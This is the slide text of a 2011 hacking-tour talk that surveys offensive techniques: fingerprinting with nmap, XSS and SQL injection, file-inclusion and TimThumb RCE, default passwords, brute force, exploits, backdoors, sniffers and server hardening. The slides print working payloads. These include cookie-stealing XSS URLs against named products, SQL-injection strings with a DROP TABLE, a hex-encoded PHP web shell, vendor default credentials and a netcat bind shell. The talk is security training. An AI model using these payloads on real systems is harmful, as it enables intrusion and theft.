2. chương trình nghị sự
Vân tay
Thất bại ở những nơi
Phía sau cánh cửa
bạo lực
vỏ mã
khai thác
Máy quét
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
3. FingerPrint
Grab informations about a target host.
Ex: It's used to identify Operational System and/or
Services(daemon) version number by TCP/IP response's
unique characteristics.
The best tool for discovery operating systems, services,
devices and others: NMAP (Network Mapper)
Basic commands:
nmap host (Basic)
nmap –sV host (Service Versions)
nmap –PN host ( ICMP ECHO-REPLY Ignore)
nmap –O host (Try to grab O.S version)
nmap –f host (Firewall/IDS/IPS Evasion)
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
4. Passive - FingerPrint
• TTL - When the operating system sets the Time To Live
on the outbound packet
• Window Size - When the operating system sets the
Window Size at.
• DF - =The operating system set the Don't Fragment bit.
• TOS - The operating system set the Type of Service,
and if so, at what.
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
7. FingerPrint
In BackTrack Linux you can find many softwares to
Finger-Print
Http://www.backtrack-linux.com
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
8. Web Vulnerability
These vulnerabilities are initially explored through
malicious browser requests compromising the target
in a matter of minutes
Cross Site (XSS) – Reflected / Stored
SQL-Injection
PHP (LFI / RFI/ AFU / RCE)
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
9. Web Vulnerability
Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in web applications that enables
malicious attackers to inject client-side script into web pages
viewed by other users.
Spekx – Knowledge Base -
http://server/pls/ksp_acesso.login_script?p_time=%221%22%
3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
LMS Web Ensino – TOTVS
http://site/lms/sistema/webensino/index.php?
modo=resbusca_biblioteca&pChave=a%22%2F%3E+
%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
&Submit=Buscar
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
12. What is the impact?
Why?
Examples?
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
13. Web Vulnerability
SQL-Injection
It occurs when the attacker can insert a series of SQL statements
within a 'query' by manipulating the data entry application.
SELECT campos FROM tabela WHERE campo = 'test@test.com';
Inject string: some' OR 'x'='x
SELECT fields FROM table WHERE field = ‘some' OR 'x'='x';
admin'-- " or 0=0 # ' or 1=1-- hi' or 'a'='a
' or 0=0 -- or 0=0 # " or 1=1-- hi') or ('a'='a
" or 0=0 -- ' or 'x'='x or 1=1-- hi") or ("a"="a
or 0=0 -- " or "x"="x ' or a=a-- ‘);Drop table x;--
' or 0=0 # ') or ('x'='x hi" or 1=1 -- ') or ('a'='a
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
14. SQL-Injection
LIVE DEMO OCOMON
Throwing fudge at the fan
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
15. Web Vulnerability
CGI/PHP Command Injection
It occurs when the attacker insert a series of
commands exploiting vulnerable CGI/PHP scripts
OneorZero – AFU + LFI
http://server/oneorzero/index.php?controller=../[FILE].php
WordPress TimThumb (Theme) Plugin – RCE
x47x49x46x38x39x61x01x00x01x00x80x00x00
xFFxFFxFFx00x00x00x21xF9x04x01x00x00x00
x00x2Cx00x00x00x00x01x00x01x00x00x02x02
x44x01x00x3Bx00x3Cx3Fx70x68x70x20x40x65
x76x61x6Cx28x24x5Fx47x45x54x5Bx27x63x6D
x64x27x5Dx29x3Bx20x3Fx3Ex00
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
16. Default/Weak passwords
Default passwords are set by its manufacturers/developers
and were not changed after the installation/configuration.
As supplied by the system vendor and meant to be changed at
installation time (Nobody do this shit)
Ex: Sw 3Com:
User: security - Pass: security
FireBird:
User: sysdba - Pass: masterkey
Weak: Passwords that are easily guessed or in a keyboard
sequential
Ex: 123456 - Love - House´s phone - Birthday - Etc...
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
17. Brute Force
It consists in using random combinations of
characters/numbers and symbols, wordlists and/or
string generators to crack a password
Ex:
John the Ripper
Hydra
SSH Brute Force
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
18. Brute Force
DirBuster - DirBuster is a multi threaded java application designed
to brute force directories and files names on web/application servers
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
19. Exploits
Kinds of Exploits:
Local: Usually, the objective of a local exploit is to elevate
user's privileges on the machine as close as possible to
root (uid=0) or administrator. They are written to exploit
kernel bugs or suid binaries
Remote: It works over a network connection and
exploit the vulnerable target without any prior access to it.
www.securityfocus.com
www.secunia.com
www.exploit-db.com
0Days It works usually an unpublished exploit from a brand
new found vulnerability. You can buy! $$$$$
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
20. Exploits
If Kernel was patched?
Will we cry?
Alexos=>
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
21. Exploits
No!!!! Fuck him!!!
We have others ways to pwn the box
GNU C library dynamic linker
Suid´s
Etc...
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
22. Backdoors/RootKits
Used to maintain access to the system
We can Netcat use for this purpose:
nc –vlp 5555 –e /bin/bash
PHP - ASP - JSP
RootKits
The main purpose of a rootkit is to hide the attacker's presence
replacing vital system binaries from target's system
Example:
Hide files (with match strings)
Run command when match strings
Hide processes
Hide open ports, and others.
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
23. Scanners/Fuzzers
There are 2 types of scanners: Specific which are written for
a specific vulnerability (BSQLHacker, SQLMAP) and Generic
which are written for various kinds of vulnerabilities. Generic
scanners use known service banners/strings to locate the
potential target/vulnerabilities
W3af
Nessus
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
26. Sniffers
Sniffer monitors and analyzes network traffic. Some of these
packets may contain critical information (such as logins,
passwords and cool infos )
WhireShark -
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
29. Hardening your server
HnTool is an open source (GPLv2) hardening tool for Unix.
It scans your system for vulnerabilities or problems in
configuration files allowing you to get a quick overview of
the security status of your system.
Ewerson Guimarães (Crash) DcLabs – HackingTour 2011